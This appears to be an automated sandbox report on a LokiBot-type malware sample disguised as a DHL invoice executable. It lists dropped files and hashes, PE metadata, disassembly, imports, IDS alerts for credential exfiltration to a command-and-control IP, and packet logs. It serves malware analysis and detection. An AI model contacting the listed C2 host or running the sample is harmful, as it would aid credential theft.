SSDEEP:	192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
MD5:	637E1FA13012A78922B6E98EFC0B12E2
SHA1:	8012D44E42CD6D813EA63D5CCBF190FE72E3C778
SHA-256:	703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
SHA-512:	932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.]e..]e..]e......Ze......Ze..]e..Ie......Ye......\e......\e......\e..Rich]e..........................PE..L...^+.c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	651160
Entropy (8bit):	7.2007554633338975
Encrypted:	false
SSDEEP:	12288:HfYzP7r9r/+ppppppppppppppppppppppppppppp0YcfOZIW3I5GSY7HwOUwaIqN:/Yz1McGZL45qzvqb5cPzzEroM
MD5:	3A4573D8D04DF837BD32D2EF156E44AA
SHA1:	7C8D941BA5C89C9D7D4D36F3A41F3A2D3B0DB847
SHA-256:	A0ED9AA9FD74C33893155220C4467B83592AC8E7244475D5CBF7B37A7075AF36
SHA-512:	E8F4FF9681F711CE4E65466B899FBE442BFB87619F32B6BAD79B44BA16A1DC74C94D5D84A0F52776FDAE35B34F0E676F30FCF8CF1D17C2189582CE15C7C10801
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r...........6............@..................................)....@..............................................Q..........P...H"...........................................................................................text...2p.......r.................. ..`.rdata...............v..............@..@.data...............................@....ndata...P...`...........................rsrc....Q.......R..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	data
Category:	modified
Size (bytes):	47
Entropy (8bit):	1.1262763721961973
Encrypted:	false
SSDEEP:	3:/lSllIEXln:AWE1
MD5:	D69FB7CE74DAC48982B69816C3772E4E
SHA1:	B1C04CDB2567DC2B50D903B0E1D0D3211191E065
SHA-256:	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
SHA-512:	7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.2007554633338975
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_#U53d1#U7968.exe
File size:	651'160 bytes
MD5:	3a4573d8d04df837bd32d2ef156e44aa
SHA1:	7c8d941ba5c89c9d7d4d36f3a41f3a2d3b0db847
SHA256:	a0ed9aa9fd74c33893155220c4467b83592ac8e7244475d5cbf7b37a7075af36
SHA512:	e8f4ff9681f711ce4e65466b899fbe442bfb87619f32b6bad79b44ba16a1dc74c94d5d84a0f52776fdae35b34f0e676f30fcf8cf1d17c2189582ce15c7c10801
SSDEEP:	12288:HfYzP7r9r/+ppppppppppppppppppppppppppppp0YcfOZIW3I5GSY7HwOUwaIqN:/Yz1McGZL45qzvqb5cPzzEroM
TLSH:	A7D4BEC5E94055A0ED1AAB706A37CD358623BEFDA874941D29DE3E273BFB3932025053
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r.........

File Icon


Icon Hash:	c5a684988c94a0c5

Static PE Info

General

Entrypoint:	0x4036fc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63132B9B [Sat Sep 3 10:25:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Afkrydsningen@Dessinen.Ta, OU="Etherization Dramatik Foderstof ", O=Ravagens, L=Bastia, S=Corse, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/02/2023 02:39:05 11/02/2026 02:39:05
Subject Chain	E=Afkrydsningen@Dessinen.Ta, OU="Etherization Dramatik Foderstof ", O=Ravagens, L=Bastia, S=Corse, C=FR
Version:	3
Thumbprint MD5:	95CC370DE25AE1FCC44540D6028A09C9
Thumbprint SHA-1:	E8D72A4282B2D991E0686B21E0A67BF868084A61
Thumbprint SHA-256:	1939A81F05905FFE984B49CD800C5A234CB0C2A4A45FA99B32C077B639234CBD
Serial:	135C517E9541D723A01D08F37014F6DDD4E327B2

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00409528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00409170h]
mov esi, dword ptr [004090ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F4749123899h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F4749123873h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F474912386Dh
xor eax, eax
jmp 00007F4749123854h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F474912386Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F4749123866h
mov eax, dword ptr [esp+38h]
mov dword ptr [00435AF8h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b0c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5b000	0x351f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9cd50	0x2248
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7032	0x7200	False	0.6497395833333334	data	6.41220875237026	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x19a2	0x1a00	False	0.455078125	data	5.04107190530894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x2ab00	0x200	False	0.30078125	data	2.035495984906757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x25000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5b000	0x351f8	0x35200	False	0.21223345588235293	data	4.448741668415925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5b4f0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.07868508221933042
RT_ICON	0x6bd18	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.15114568005045195
RT_ICON	0x751c0	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.1543233082706767
RT_ICON	0x7b9a8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.175184842883549
RT_ICON	0x80e30	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.15948275862068967
RT_ICON	0x85058	0x35e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9907192575406032
RT_ICON	0x88638	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.24107883817427386
RT_ICON	0x8abe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.2678236397748593
RT_ICON	0x8bc88	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4584221748400853
RT_ICON	0x8cb30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.37459016393442623
RT_ICON	0x8d4b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.47382671480144406
RT_ICON	0x8dd60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.45564516129032256
RT_ICON	0x8e428	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0x8ea90	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3504335260115607
RT_ICON	0x8eff8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.42819148936170215
RT_ICON	0x8f460	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.43951612903225806
RT_ICON	0x8f748	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4016393442622951
RT_ICON	0x8f930	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.4831081081081081
RT_DIALOG	0x8fa58	0x100	data	English	United States	0.5234375
RT_DIALOG	0x8fb58	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x8fc78	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8fd40	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8fda0	0x102	data	English	United States	0.6046511627906976
RT_MANIFEST	0x8fea8	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5541022592152199

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20216.128.145.19649835802024313 08/10/23-19:13:04.980323	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649835802024318 08/10/23-19:13:04.980323	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49835	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649832802024317 08/10/23-19:13:02.382054	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49832	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649833802024312 08/10/23-19:13:03.684720	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49833	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649833802021641 08/10/23-19:13:03.684720	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49833	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649835802021641 08/10/23-19:13:04.980323	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649833802024317 08/10/23-19:13:03.684720	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49833	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649832802021641 08/10/23-19:13:02.382054	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.11.20	216.128.145.196
192.168.11.20216.128.145.19649832802024312 08/10/23-19:13:02.382054	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49832	80	192.168.11.20	216.128.145.196

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 10, 2023 19:13:00.129038095 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.129059076 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.129345894 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.143588066 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.143600941 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.185306072 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.185487032 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.185580015 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.186428070 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.186747074 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.284661055 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.284709930 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.285722971 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.285907030 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.288368940 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.332155943 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.621927023 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.622148991 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.622226954 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.622363091 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.622452021 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.622597933 CEST	443	49830	142.250.181.238	192.168.11.20
Aug 10, 2023 19:13:00.622728109 CEST	49830	443	192.168.11.20	142.250.181.238
Aug 10, 2023 19:13:00.773986101 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.774024010 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.774250984 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.774504900 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.774533033 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.841456890 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.842012882 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.842098951 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.842756033 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.842983007 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.846800089 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.846813917 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.847129107 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:00.847372055 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.847876072 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:00.888029099 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.184299946 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.184506893 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.184612989 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.184654951 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.184773922 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.185261011 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.185472012 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.185472012 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.185472012 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.186758041 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.186961889 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.186961889 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.186961889 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.187704086 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.187892914 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.187892914 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.189285994 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.189441919 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.189487934 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.189697027 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.189876080 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.190092087 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.190145016 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.190365076 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.195270061 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.195430994 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.195476055 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.195633888 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.195666075 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.195828915 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.195856094 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.196012974 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.196372032 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.196650028 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.196705103 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.196932077 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.197182894 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.197350979 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.197392941 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.197618008 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.197940111 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.198095083 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.198133945 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.198308945 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.198585033 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.198895931 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.198949099 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.199234962 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.199495077 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.199645996 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.199685097 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.199925900 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.200242043 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.200509071 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.200563908 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.200767040 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.201018095 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.201189041 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.201231003 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.201467991 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.201742887 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.201910019 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.201951981 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.202178955 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.202456951 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.202718973 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.202761889 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.203026056 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.203217983 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.203370094 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.203404903 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.203511000 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.203540087 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.203762054 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.203952074 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.204098940 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.204153061 CEST	443	49831	142.250.186.129	192.168.11.20
